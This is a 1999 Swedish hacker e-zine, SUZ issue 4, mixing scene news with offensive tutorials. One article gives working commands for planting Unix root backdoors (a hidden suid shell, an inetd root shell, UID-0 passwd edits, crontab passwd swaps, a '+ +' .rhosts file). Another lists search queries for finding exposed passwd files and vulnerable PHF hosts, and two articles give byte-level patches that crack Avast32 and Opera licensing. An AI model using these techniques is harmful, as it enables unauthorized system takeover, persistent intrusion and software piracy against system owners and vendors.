____________________________________________________________________________ =======S====T====A====R====T=========O=====F=========F====I====L====E======= S W E H A C K U N D E R G R O U N D ______ _____ __ _ _______ ____/ | | \ | |______ /_____ __|__ | \_| |______ N U M M E R 4 ____________________________________________________________________________ I N N E H Å L L I S U Z # 4 [0.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ¤ Innehåll..............................................................0.1 ¤ Disclaimer............................................................0.2 ¤ Medarbetare...........................................................0.3 ¤ Ledare................................................................0.4 {s w e h a c k} ¤ Kanalen...............................................................1.1 ¤ Hemsidan..............................................................1.2 {h / p / v / c / a} ¤ Bakdörrar i UNIX system...............................................2.1 ¤ AntiOnline bygger ut..................................................2.2 ¤ Sök och finn..........................................................2.3 ¤ Unik lagstiftning i Norge.............................................2.4 ¤ Så crackar man Avast32................................................2.5 ¤ Gud stöttar Flashback.................................................2.6 ¤ Så crackar man Opera 3.51.............................................2.7 ¤ Krascha Netscape......................................................2.8 ¤ Hyperlänkar...........................................................2.9 ____________________________________________________________________________ D I S C L A I M E R [0.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ All information i denna filen är skriven i utbildnings syfte. Ni kan aldrig komma och påstå att denna filen uppmanar till brott eller något annat olag- ligt. Allt ni gör efter att ni läst något ur denna filen är helt på er egen risk och ni har själv allt ansvar för följderna. Vi avskriver oss härmed allt ansvar för era handlingar. ____________________________________________________________________________ M E D A R B E T A R E [0.3] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Gazzaud -=- [gazzaud@operamail.com] IP HIJACKER -=- [---] med flera... ____________________________________________________________________________ L E D A R E [0.4] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Här kommer SUZ #4. Tidningen har ändrat lite i uppläggningen inför detta numret. T.ex. så har "fasta avdelningar" försvunnit eftersom ni läsare som hört av er med kritik har tyckt detta. Ni tyckte inte den innehöll någon vettig information och att den lika gärna kunde slopas. Eftersom SUZ's uppläggning, innehåll mm. bestäms av läsarna så var det inte särskilt svårt att ta bort avdelningen. Jag hoppas att ni alla tycker detta är bra. Om inte så hör av er. Det har varit en del oklarheter när det gäller vilka e-mail adresser man ska använda. Jag tänker nu göra klart det en gång för alla. - Används för att starta eller avsluta en prenumeration. Observera att inga e-mail till denna adressen kommer att bli lästa av någon person. E-mail som ni vill ska bli lästa skickas till . Subscribe - För att starta ska man skicka ett e-mail med "Subscribe" som (Starta) "subject". (Använd inte citattecken ("").) Unsubscribe - För att avsluta ska man skicka ett e-mail med "Unsubsribe" (Avsluta) som "subject". (Använd inte citattecken ("").) - Används för frågor, kommentarer, artiklar mm. som berör Swehack eller något av deras projekt som t.ex. SUZ. - Använs för frågor, kommentarer och annat som berör mig. Kommentarer angående SUZ skickas till . ska läsa. En del kan få problem när de läser SUZ eftersom SUZ använder en layout som bygger på att läsarna använder något s.k. monospace-typsnitt. Monospace- typsnitt är typsnitt där alla tecken är lika breda, exempel på sådana typsnitt är courier och geneve. Times är ett exempel på ett typsnitt som inte är ett monospace-typsnitt. Om ni av någon anledning inte vill använda ett monospace-typsnitt när ni läser er e-mail så går det även bra att läsa SUZ på WWW. Om ni läser SUZ i notepad så fungerar det också bra. Som vanligt så ber vi er att skicka oss artiklar, nyheter, länkar, inlägg, annonser mm. för publicering i nästa nummer. Gör Ni det så kommer förhoppningsvis nästa nummer av SUZ ut som planerat, alltså någon gång i nästa månad. Tankar och idéer på vad som kan förbättras tags också tacksamt emot. Information is free - take it or leave it! // Contagion | con@linux.nu | 99-01-18 Allt rörande SUZ kan skickas till swehack@linux.nu ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ <-------------------------<--<<---<<<--->>>--->>-->------------------------> <-------------------------< S W E H A C K >------------------------> <-------------------------<--<<---<<<--->>>--->>-->------------------------> ____________________________________________________________________________ K A N A L E N [1.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Kanalen har nu blivit utrustad med den omtalade botten. Det sitter med "swehack-bot" som nickname. Den är inte helt färdigkonfigurerad än men den är i varje fall igång och har än så länge gjort vad den ska. Det är chonic^ som sett till att den fungerar som den ska så vad mer kan jag säga än Tack! Swehacks IRCkanal:....................#Swehack...DALnet (irc.dal.net) ____________________________________________________________________________ H E M S I D A N [1.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Hemsidan har ändrats en del sedan förra numret. Bl.a. har den fått en ny rubrik och ett javascript har lagts till. Javascriptet känner av browser typ för att sedan skicka vidare personen ifråga till rätt version av sidan. Detta är nödvändigt då det tyvärr inte finns någon komplett standard för DHTML. Filarkivet har som vanligt även utvidgas, om inte mycket så lite. Jag vet att det finns mycket som kan förbättras men det är svårt att se alla fel själv. Därför ber jag er om hjälp för att sajten ska kunna förbättras ytterligare. Skicka mig några rader med dina tankar och idéer om sidan så ska jag se vad jag kan göra för att förbättra den. Swehacks hemsida:.....................http://www.flashback.net/~mm/swehack/ http://swehack.cjb.net/ ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ <-------------------------<--<<---<<<--->>>--->>-->------------------------> <-------------------------< H / P / V / C / A >------------------------> <-------------------------<--<<---<<<--->>>--->>-->------------------------> ____________________________________________________________________________ B A K D Ö R R A R I U N I X S Y S T E M [2.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Tänkte skriva en liten artikel om hur man kan lägga in bakdörrar i UNIX/Linux system. Artikeln är som vanligt bara exempel och bör aldrig utföras på så sätt att du skaffar dig tillträde till någon annans system.... Texten kommer bara att ange olika sätt att behålla root efter det att du tagit den. Denna gång kommer jag att ta upp dessa enkla bakdörrar och till nästa gång räknar jag med att jag har fixat ihop en fortsättning på detta tema. Dom här bakdörrarna är enkla och snabba att placera i någons system. Fortsättningen på texten kommer att behandla mer avancerade bakdörrar men just nu får ni hålla tillgodo med dom här. --< INNEHÅLL >-- 1; Lämna ett skal i /tmp 2; Editera /etc/inetd.conf 3; Ändra /etc/passwd filen 4; Crontab 5; Rhosts 1; Lämna ett skal i /tmp ^^^^^^^^^^^^^^^^^^^^^^^^ Om du kopierar över /bin/sh som root till /tmp/sh och ändrar rättigheterna på det så kan du nästa gång du kommer tillbaka enkelt gå till /tmp och skriva ./sh så har du root igen. Vi går igenom hur. ----< Skapa bakdörren >--- #cp /bin/sh /tmp/sh <--- Kopiera över sh. #chmod 4755 /bin/sh <--- Göra det till suid program ----< Använda den >---- %cd /tmp <--- Gå till /tmp där vårt skal ligger %./sh <--- Aktivera skalet # <--- Voila! Vår trevliga root prompt... Oki, denna är väl nästan den enklaste du kan göra men är väldigt effektiv. Ett tips är att inte döpa den till "sh" utan typ ".sys" eller nåt så den inte syns lika väl. :) 2; Editera /etc/inetd.conf ^^^^^^^^^^^^^^^^^^^^^^^^^^ Denna bakdörr går ut på att istället för att det finns ett riktigt program som faktisk skulle tänkas göra något vettigt så har du ett skal som väntar på en port. Denna är också väldigt enkel att göra och i filen /etc/inetd.conf så kollar vi lite... telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetd Så kan det se ut på en rad i filen. Om vi editerar den så här: telnet stream tcp nowait root /bin/sh sh -i så blir den ännu roligare. Då har vi ett root-skal som ligger och väntar på dig så fort du kör telnet mot den hosten. Denna bakdörr är *extremt* kraftfull eftersom vem som helst kan få full tillgång till den hosten. Men det är en bakdörr i.a.f. så jag tänkte att den var bra. Du måste sedan starta om inetd för att den ska fungera. Gör inte detta dagtid då folk har en konstig förmåga att jobba då. Och lägg inte bakdörren på telnet-porten heller. Lägg den på någon annan, typ time eller liknande. 3; Editera /etc/passwd filen ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Okej, detta är kanske den dummaste bakdörr som finns... men vafan, vi kör ändå! ---< En ordinär passwd fil >--- johnD:czWSrK9ZleFSs:503:100:John Dumone:/home/johnD:/bin/bash Richard:QwdsXeGdZcV2k:504:100:Richard Loyle:/home/Richard:/bin/bash LisaR:EKYFkVtR6xEbs:505:100:Lisa R:/home/LisaR:/bin/bash ---< En mixtrad passwd fil >--- johnD:czWSrK9ZleFSs:0:0:John Dumone:/home/johnD:/bin/bash Richard:QwdsXeGdZcV2k:504:100:Richard Loyle:/home/Richard:/bin/bash LisaR:EKYFkVtR6xEbs:505:100:Lisa R:/home/LisaR:/bin/bash Vi ändrade om lite i "johnD" kontot så han fick UID 0 och GID 0. Då är han alltså root. Denna bakdörr hittas nog först av alla. Enkel och bra för oövervakade system med en idiot som sysadm. 4; Crontab ^^^^^^^^^^ Denna bakdörr är gjord så att du kan logga in på hosten med ett konto under en viss tidsperiod. En crontab fil är uppbyggd på följande sätt: 1 2 3 4 5 6 0 0 * * 1 /usr/bin/updatedb 1 = minut 2 = timme 3 = dag i månaden 4 = månad 5 = veckodagen 6 = Program som ska köras Så då kan vi göra så att systemet byter ut passwd filen till en annan som du har lagrad någonstans. Lägg till i crontab: 30 0 * * * /bin/mv /etc/passwd /tmp/.passwd 31 0 * * * /bin/cp /tmp/.nya_passwd /etc/passwd 30 1 * * * /bin/mv /tmp/.passwd /etc/passwd Vad gör det där då? Det byter ut passwd filen mot en annan som du gömt i /tmp klockan 00:30. Då har du en ny passwd fil som du kan logga in på. Självklart har du ju fixat ett root konto på den nya passwd filen. Sen när klockan blir 01:30 så byts passwd filen ut mot den gamla och allt blir frid och fröjd...trodde sysadm. 5; Rhosts ^^^^^^^^^ Den här är också lite speciell. Man lägger till en fil i hemkatalogen för det kontot man vill ha, sen när nu kör en "rlogin" från ditt UN*X/Linux system så blir du den användaren direkt. Lägg till en fil i t.ex. / som heter .rhosts som det står följande i: + + Du kan även döpa den till .rlogin . That´s all for now folks! -----< IP HIJACKER >----- RELKLAM!!! Jolt Cola- Twice the caffeine Linux- What do you want to do now? Copyleft 1999 ---------------------------------------------------------------------------- Skrivet av IP HIJACKER ---------------------------------------------------------------------------- ____________________________________________________________________________ A N T I O N L I N E B Y G G E R U T [2.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ AntiOnlines har beslutat sig för att utvidga sin sajt. Informationen på deras nuvarande sajt kommer att placeras ut på flera olika domäner. De kommer också att införa en hel del nytt på deras sidor. Det s.k. "The AntiOnline Network" kommer att vara klart någon gång i mitten av februari. Här nedan följer vilka domäner som kommer att finnas och vad de kommer att innehålla. www.AntiOnline.com Det här domänet kommer att innehålla de senaste nyheterna från underground världen. Det är 30 individer som kommer att arbeta på att detta ska bli en lyckad plats. Dessa lyckliga 30 människorna har valts ut från över 7 000 intresse-anmälningar. www.AntiSearch.com Detta kommer att bli en riktig höjdare. Här kommer man kunna söka i ett stort index över undergroundsidor för att hitta just "det där". "The AntiSearch spider" kommer att köras 24 timmar/dygn för att se till att databasen alltid är uppdaterad. www.IOMagazine.com Detta kommer bli det nya hemmet för det populära I/O zinet. IOMagazine kommer förövrigt att innehålla nerladdningsbara program, källkod mm. www.AntiStore.com Här kommer det finnas datorsäkerhets relaterade produkter att köpa. Även hacking relaterade saker kommer att finnas. www.AskBub.com Här kommer man kunna få hjälp med sina säkerhets relaterade problem helt gratis. www.AntiOnline.org AntiOnline startade sin sajt på ett 5 MB konto som deras founder, John Vranesevich fick gratis av en vän. Nu kommer AntiOnline själva göra samma sak; de kommer ge ut gratis konto till de som behöver. Detta gör de eftersom de vill hjälpa folk att komma igång med sin verksamhet. ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: AntiOnline, http://www.antionline.com/ ---------------------------------------------------------------------------- ____________________________________________________________________________ S Ö K O C H F I N N [2.3] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ En Kort Artikel Om Att Söka Och Finna ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Det här blir en kort artikel eftersom jag inte riktigt har tid, har fullt upp med två olika programmeringsprojekt och högtiden som kallas Jul. Därför blir det som vanligt, kort, koncist och utan utsvävningar (förutom den här då :-). -=- Den Som Söker Skall Finna -=- Först går vi in på sökmotorn Altavista, denna jättelika ansamling av information av det vidaste slag, som trots vissa försök till motsatsen ligger öppen för alla som vet hur. Eftersom jag inte skapar mig några illusioner om läsekretsen så går vi in på de tre områden som de flesta använder Altavista till: Bakdörrar, Serialz och Phf-script. Även om jag är tveksam till det första och sista fungerar de som exempel och jag har tagit med dem eftersom de utgör en bas för att visa olika knep, samt viktigast av allt, hålla intresset. -=- Syntax -=- Först några kommandon och liknande som är mycket användbara när man söker efter saker och ting. ("") (+) (-). Bortse från parenteserna de fungerar endast som seperatörer. "" runt ett ord indikerar en grupp ord som ska letas efter tillsammans (ex "Master of Puppets"). + anger ett ord som MÅSTE finnas med på sidan för att den ska räknas som en hit. - anger motsatsen. Innehåller sidan det ordet så ska den sidan ignoreras. Självklart kan du kombinera "" med + eller -. Vi har också domain och link som fungerar som det grövsta kriteriet. Doman:edu till exempel returnerar bara sidor som ligger på en domän med edu. Link:phf.cgi returnerar sidor som har en länk som leder till phf.cgi. Användbart helt klart, nu över till lite exempel. -=- Parent Directory No? -=- För alla er snuskisar som letar bakdörrar har nog märkt att Altavista numera hårdkodat bort "Parent Directory", men häng inte läpp för det. Gör så att ni tar det dom glömde (varför "Parent Directory" när resten funkar lika bra?) och slänger ihop med eran egen sexuella preferens eller intresse och vips har du genast en massa bakdörrar. +"Last Modified" +"Size" +pic +teen eller +"Last Modified" +"Name" +sex eller +"Last Modified" +"Name" +"01" -free eller +"Index Of" pic image eller någon av de otaliga variationer som finns. Det kan vara så att den sista av dessa "Index Of" också är bortkodad, men sådant märks. När jag kontrollerade att det funkade hittade jag runt 10 bakdörrar med bara en av metoderna. Fler finns, men dom försvinner snart. AltaVista gör sitt bästa för att man inte ska hitta sådana här "misstag" i deras sökmotor men som ni kommer se om ni läser vidare så finns det värre. -=- Serial Cracker -=- Eftersom ni redan lärt er de grundläggande knepen för att hitta saker så går vi igenom lite mer övergripande metoder härnäst. Självklart ska ni titta igenom olika FTP-sökmotorer innan ni kommer till Altavista eftersom det ger er större chans att hitta något, men när ni väl hamnar på AltaVista för att hitta ett crack/serial (förutsatt att ni inte kan cracka det själva :-) försök samla lite information om programmet först vilket gör att ni kan sålla bort mer skräp. När släpptes det? (sortera bort dokument äldre än så), finns det flera versioner? (titta om ni kan hitta några beskrivande cracks till äldre versioner (om ni läst min artikel om Opera så vet ni att skydden inte ändrar sig så ofta från version till version)) och så vidare. När man använder lite eftertanke innan brukar man spara in många timmar av att ploga sig igenom skit för att hitta det man vill ha. -=- The Golden Oldie -=- Eftersom teknikerna på AltaVista alltid ligger steget efter (som det ska vara eller hur? :-) så tror dom ofta alldeles för tidigt att dom fixat olika "misstag". Ofta går det fortfarande att få fram samma resultat, det gäller bara att tänka efter. För ett tag sedan var det till exempel vanligt att hackers satt och sökte efter mis-indexerade /etc/passwd och /etc/group filer. AltaVista hårdkodade bort det (verkar vara deras standardlösning) och trodde allt var frid och fröjd tills någon knäckte ett edu nätverk med just den metoden. Hoppsan. Samma sak gäller självklart PHF. De tror att de fixat det, men med lite arbete är det precis som 'the good old days'. Den gamla metoden med att söka efter PHF kommer mestadels ge er en massa brutna länkar eller 'Candid Camera' meddelanden. Så eftersom vi letar efter en fil går vi över till en FTP search. Finns några stycken och en är: ftpsearch.ntnu.no. Eftersom ftp och http ofta ligger på samma maskin är det bara att ersätta den funna ftp:n mot http och (tadaaa!) en maskin öppen för PHF. Några exempel på PHF sökningar: www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=domain%3Aedu+ %2Bcgi-bin+%2Bphf&search.x=21&search.y=12 http://www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=domain %3Aedu+link%3Acgi-bin%2Fphf&search.x=55&search.y=5 http://www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=link%3 A cgi-bin%2Fphf&next.x=43&next.y=9 Ni får ursäkta radavbrotten. -=- Before I leave -=- Kunde ni alla dom här knepen och trixen redan (det är bara att AltaVista's hjälp eller någon bra artikel) så fick ni ut väldigt av artikeln och ni får ha överseende med det. Lärde ni er NÅGONTING så har denna lilla text i alla fall ett LITET syfte. Vill ni gnälla eller i övrigt kommentera kan ni nå mig på Gazzaud@hotmail.com eller #SweHack. Over and out. ---------------------------------------------------------------------------- Skrivet av Gazzaud | gazzaud@operamail.com ---------------------------------------------------------------------------- ____________________________________________________________________________ U N I K L A G I N O R G E [2.4] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Norges Högsta domstol har nyligen beslutat att det inte är ett brott att försöka bryta sig in i datorer, så länge man inte har brutit sig in i systemet. Högsta domstolen slår också fast att den som har sin dator ansluten till Internet måste acceptera att folk kommer att försöka ta sig in på deras system och därför menar de att det är ägarens ansvar att skydda sina datorer. I teorin kan alltså hackers från hela världen flytta till Norge och helt lagligt leta efter säkerhetsluckor i datorer. Denna domen är troligen den första av sitt slag. ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: USA Today ---------------------------------------------------------------------------- ____________________________________________________________________________ S Å C R A C K A R M A N A V A S T 3 2 [2.5] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Avast32 v7.70 - Crack Demo/Patch ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ -=- Förord -=- Ibland anstränger man sig i onödan. Blir så när man överskattar sin fiende. Vad jag trodde var en komplicerad CRC-kontroll visade sig vara ett enkelt patch-skydd. Så istället för att handla om ett avancerat skydd, kommer jag beskriva kombinationen av två enkla. I efterordet tar jag upp hur de SKULLE kunnat gjort för att göra crackingen till en smärre mardröm. Självklart behöver jag inte säga att om ni planerar att använda det här programmet längre än demo-perioden så ska ni köpa det. Som vanligt. En annan sak. Den metod som jag använder här är varken den bästa eller den enda metoden för att komma runt Avast32's skydd. Orsaken till det är att jag är nybörjare på cracking. Så se det som en blinds rundtur igenom taggtråden. Jag lyckades med vad jag föresatt mig. Den här gången. Vill du gnälla på mig över ett dåligt crack, så låt bli, jag vet redan att det är dåligt. Men det funkar. Därför duger det åt mig. Elegans kan jag vänta med tills jag är duktig. -=- Programbeskrivning -=- Avast32 är ett avancerat anti-virus program som med både virus kontroll och resident kontroll över misstänkta operationer ger Avast32 ett starkt skydd mot virus. Uppdateringsdatabaser finns att ladda hem från deras sida så att man hela tiden kan skydda sig mot det senaste virusen. Jag har inte senaste databasen och har därför inte brytt mig om att kontrollera om Avast32 skyddar mot NetBus och/eller Back Orifice. -=- Demo is over - purchase -=- När demo-perioden var över tänkte jag att jag skulle titta igenom Avast32's skydd. Eftersom programmet i sig självt är avancerat (skrivet i Microsoft Visual C++) tänkte jag att dom borde ha ett lika avancerat skydd. Observera: Bara för att lära mig. Så jag sparkade igång WDasm tittade igenom Avast32.exe och hittade inga strängreferenser. Så dom använder dynamisk allokering. Jahapp. Så jag tittar efter funktioner som kan ha med det att göra. Då ser man följande misstänkta funktioner: AVBASIC._aswIsDemoMode@0 AVBASIC._aswIsPatched@0 AVBASIC._aswIsExpiredMode@0 AVBASIC.?ComputeChecksum@@YAKPAX@Z AVBASIC.?ComputeChecksum@@YAKPAEK@Z Orsaken till att dom lagt sina funktioner i en .DLL får vi snart reda på. Det har inget med skyddet att göra utan är bara sund programmering. Men vi öppnar Avbasic.dll i WDasm för att se vad dessa funktioner gör. Inte mycket. De hämtar ett värde från en variabel. Roterar. And. Återvänder. Så vi börjar med att invertera de hopp som ligger efter anropet till _aswIsDemoMode och _aswIsExpiredMode. Då får vi upp en dialogruta som säger nånting i stil med: "Ni använder en hackad version av Avast32 kontakta närmaste återförsäljare". Hmmmmm... Inte hackad. Men snart väldigt crackad. Här hamnade jag på ett sidospår. Jag tänkte att eftersom de har funktioner för att kontrollera sina filers checksum borde dom använda dessa i crack-skyddet. Så jag gräver runt lite i ?ComputeChecksum funktionerna men hittar ingenting som tyder på att de används. Så jag startar SoftIce och sätter några brytpunkter. Det visar sig att den går igenom _aswIsDemoMode, _aswIsPatched, _aswIsExpired men också _aswIsAdmin. Lurigt. Jag som trodde den hade med deras övriga NT kod att göra. Så vi tittar igenom vad som lämnas tillbaks av funktionerna i Avbasic. Den hämtar sina värden från olika variabler, men alla slutar som noll. Så vi får modifiera deras funktion lite. _aswIsAdmin är den som anropas flest gånger så vi tittar på hur den ser ut. 10001590 A098560010 mov al,byte ptr [10005698] ; innehåller 43h 10001595 2401 and al,01 ; eax blir noll 10001597 c3 ret 10001598 90 ; var tacksam för dessa nop för 10001599 90 ; med min metod behövs dom 1000159A 90 1000159B 90 1000159C 90 1000159D 90 1000159E 90 1000159F 90 Så eftersom hoppena efter är inverterade borde funktionen alltid lyckas. Men det verkar som jag missat några kontroller. Så vi gör så att funktionen ALLTID lämnar tillbaks ett. 10001598 A098560010 mov al,byte ptr [10005698] 10001595 B801000000 mov eax,00000001 1000159A C3 ret 1000159B 90 ; färre nop's... 1000159C 90 ; det är för att följande funktion måste 1000159D 90 ; ligga på samma adress som förut, annars 1000159E 90 ; rasar hela skiten. 1000159F 90 Så nu funkar Avast32.exe. Men? Visst ja. Måste fixa Rgw32.exe också. Eftersom den använder funktionerna i Avbasic.dll behöver du bara invertera alla hopp och saken är biff. Nästan i alla fall. Om du tittar i rgw32.exe under funktionen _aswExpiredMode@0 så har du en liten knepighet. 00403E8C E80B440000 call 0040829C ; _aswExpiredMode@0 00403E91 25FF000000 and eax,000000FF 00403E96 85C0 test eax,eax 00403E98 0F84E8000000 je 00403F86 JE satsen kan vara lite knepig att invertera om man är ny på cracking eller assembler. Men ändra den till: E9E9000000. Jag vet. Den blir inte inverterad utan blir en JMP-sats, men det är som det ska vara. -=- Efterord -=- Sådär nu ska Avast32 fungera igen och deras skydd besegrat. Det hade gått en hel del fortare om jag inte överskattat deras skydd, men det är sådant man lär sig antar jag. "Protectionists are a lazy bunch" för att citera +ORC. Hade de istället för denna enkla metod använt checksum resultatet (som nog bara används för att förhindra virus-infektion, jag ska kontrollera saken bara för nyfikenhetens skull) antingen i ett call eller jump sats helt och hållet utanför en enskild funktion (gärna med någon ytterligare kontroll) skulle det blivit MYCKET svårare att cracka. Har jag glömt något, missat något eller är allt för otydligt så kontakta mig på: gazzaud@operamail.com eller #SweHack @ DALnet Skriven Av: R. G. Gazzaud ---------------------------------------------------------------------------- Skrivet av Gazzaud | gazzaud@operamail.com ---------------------------------------------------------------------------- ____________________________________________________________________________ G U D S T Ö T T A R F L A S H B A C K [2.6] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Namnpiraterna Control-Alt-Delete stöttar Flashbacks ansvarige utgivare Jan Axelsson genom att dela med sig av vinsten de får på tre domäner som de säljer till högstbjudande. Gud.com hör till dessa domäner och nuvarande bud ligger på 12 000 kronor, men budgivningen pågår fram till och med den 1 mars. DE andra två domänerna som kommer att auktioneras ut är Wallenberg.com och Regeringen.com Pengarna som Flashback får in till sin Rätthjälpsfond kommer att oavkortat gå till rättegångskostnaderna och kostnaderna för skadeståndet som Flashback blivit dömda att betala. Tidningen Flashback publicerade nämligen år 1995 namn och foton på dömda sexualbrottslingar. För detta har Jan Axelsson dömts att betala 50 000 kronor i skadestånd till en av brottslingarna. Flashback anser att publiceringen var försvarbar, då uppgifterna bygger på offentliga handlingar och är korrekta. Domen har överklagats. Flashbacks hemsida:...................http://www.flashback.se/justice/ Control-Alt-Delete's hemsdia:.........http://www.controlaltdelete.com/ ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: Flashback, http://www.flashback.se/ ---------------------------------------------------------------------------- ____________________________________________________________________________ S Å C R A C K A R M A N O P E R A [2.7] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Opera 3.51 (Opera 3.50 BETA 11) - Seriell / Patch ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ -=- Förord -=- Ok, så jag sa att jag skulle låta bli framtida versioner av Opera, men ibland kan man bara inte låta bli. De har drastiskt förbättrat sitt skydd och det tog faktiskt ganska lång tid för mig att knäcka det (i.a.f. jämfört med tidigare versioner). För alla er som läst MyWord VI (inte allt för många, så det här får nästan räknas som reklam ;-) kommer ihåg att Opera 3.50 BETA 10 var ganska enkelt att 'fixa'. Det var bara att leta upp strängreferensen, spåra en bit bakåt och ändra 2 byte för att få hela programmet att fungera. Antagligen tog sig utvecklarna en djup funderare efter det, för en drastisk uppgradering skedde. MEN. Följande artikel är främst riktad till de som vill LÄRA sig cracking. Alla som vill stjäla deras program kan vänta tills det dyker upp serialz eller crackz på alla de tusentals warez siter som finns överallt. Det besparar er en hel del möda. Som jag sa i MyWord VI (mer reklam, reklam, reklam) gillar jag den här browsern som trots oschysst konkurrens och fula knep från främst Micro$oft lyckats etablera sig på en stenhård marknad. När alla andra åkt snålskjuts på Mosaic har Opera utvecklats ur ingenting, byggt helt och hållet på egen teknik. Så stöd Opera om ni kan och köp en licens och använd programmet lagligt. För er som inte har råd/vill/kan/orkar/gitter köpa en licens följer här ett fullt funktionsdugligt crack. -=- Tools of the Trade -=- WDasm 8.x Hexeditor (HexWorkshop är bra) -=- Chasing the String of fortune -=- Det allra första som jag brukar göra när jag har fått ett nytt mål är att gå igenom strängreferenserna, så även denna gång. "This evaluation version has expired" Ser ut och vara vad vi letar efter. Så vi börjar spåra bakåt bara för att finna att funktionen är anropad dynamiskt. Så hur kan man veta om en funktion är dynamiskt anropad? När du kommer till början av funktionen och du inte har några referenser och koden ovanför absolut inte har med saken att göra, då vet du att den är dynamiskt anropad. Troligen har dom gjort just så för att förhindra den metod som använts på tidigare versioner. Vi kontrollerar de andra sträng referenserna bara för säkerhetsskull och finner att de anropas på exakt samma vis. -=- The pot of gold beneath the .DLL -=- Så då kontrollerar jag om det finns några importerade funktioner som kan ha med skyddet att göra. Nix. Bara för att vara på säkra sidan kontrollerar jag alla .DLL:er för att se deras exporterade funktioner, fortfarande ingenting. -=- Don't waste my time -=- Dags att börja zen-crackingen. Ladda upp en dos tålamod och börja spåra på allvar. Vi vet att programmet måste kontrollera nuvarande tid mot tiden då det vart installerat för att se om utvärderingsperioden är över. Att gå igenom alla dessa referenser tar en stund så jag ska bespara er den tiden. -=- SPLASH! -=- Eftersom varken ni eller jag har tålamodet som krävs för att gå igenom alla dessa referenser för kontroll av tid (det blir några stycken) ska jag presentera en annan metod. Ni vet rutan som dyker upp när du startar Opera där det står antingen Registered To: [Unregistered] eller snart Registered To: endast. Den 'skylten' kallas av utvecklarna för en 'splash screen'. Så vi kollar igenom referenser för 'splash' och '(unregistered)'. Vi hittar (bl.a.) funktionen 00494907 (skapar själva Splash-screenen), spårar bakåt lite och hamnar: 004876B0 E8789AFDFF call 0046112D ; Kontrollerar om användaren valt bort splash 004876B5 85C0 test eax,eax 004876B7 7407 je 004876C0 004876B9 57 push edi 004876BA E848D20000 call 00494907 ; Skapar splash-screenen Vad hittar vi inte lite längre ner? En funktion för tid/datum. Hoppsan, hoppsan. Vi är definitivt på rätt väg. I vilken riktning du än går nu stöter du på funktionen 0045E045. Så vi tittar igenom den. Call 004B722E; hämtar & kontrollerar tid Call 004E1683; kontrollerar om viss tid (ett dygn) ; förflutit sedan förra kontrollen Call 004B6ECC; kontroll om registrerad Bingo! Guldet är funnet och Opera snart fixat (igen). 004B6ECC 8D8138010000 lea eax,dword ptr [ecx+00000138] 004B6ED2 85C0 test eax,eax 004B6ED4 741A je 004B6EF0 004B6ED4 803800 cmp byte ptr [eax],00 004B6ED9 7415 je 004B6EF0 004B6EDB 81C190030000 add ecx, 00000390 004B6EE1 51 push ecx 004B6EE2 E8C49BFDFF call 00490AAB 004B6EE7 85C0 test eax,eax 004B6EE9 59 pop ecx 004B6EEA 7404 je 004B6EF0 004B6EEE 6A01 push 00000001 004B6EEF C3 ret 004B6EF0 33C0 xor eax,eax 004B6EF2 C3 ret Som ni ser är den ganska enkel att fixa. NOP:a alla hopp och Opera fungerar som...registrerat. Har ni tid och ork kan ni istället använda SoftIce och fylla de variabler som sedan används vid Registered To:, men det är överkurs så det tar jag inte upp. Programmet är registrerat och cracket nästan slut. Ytterligare en lite sak bara. Om du tycker det är irriterande med "The evaluation period has expired" rutan som dyker om lite slumpmässigt, så inc ax precis innan ret. Eller not. Smaksak. -=- Efterord -=- Om ni inte hängde med riktigt i hur cracket utfördes eller hur jag kom till de kodstycken jag kom så var lugn, det gör inte jag heller. Därför hänvisas alla klagomål, önskningar och frågor till /dev/null. *Gromf*. 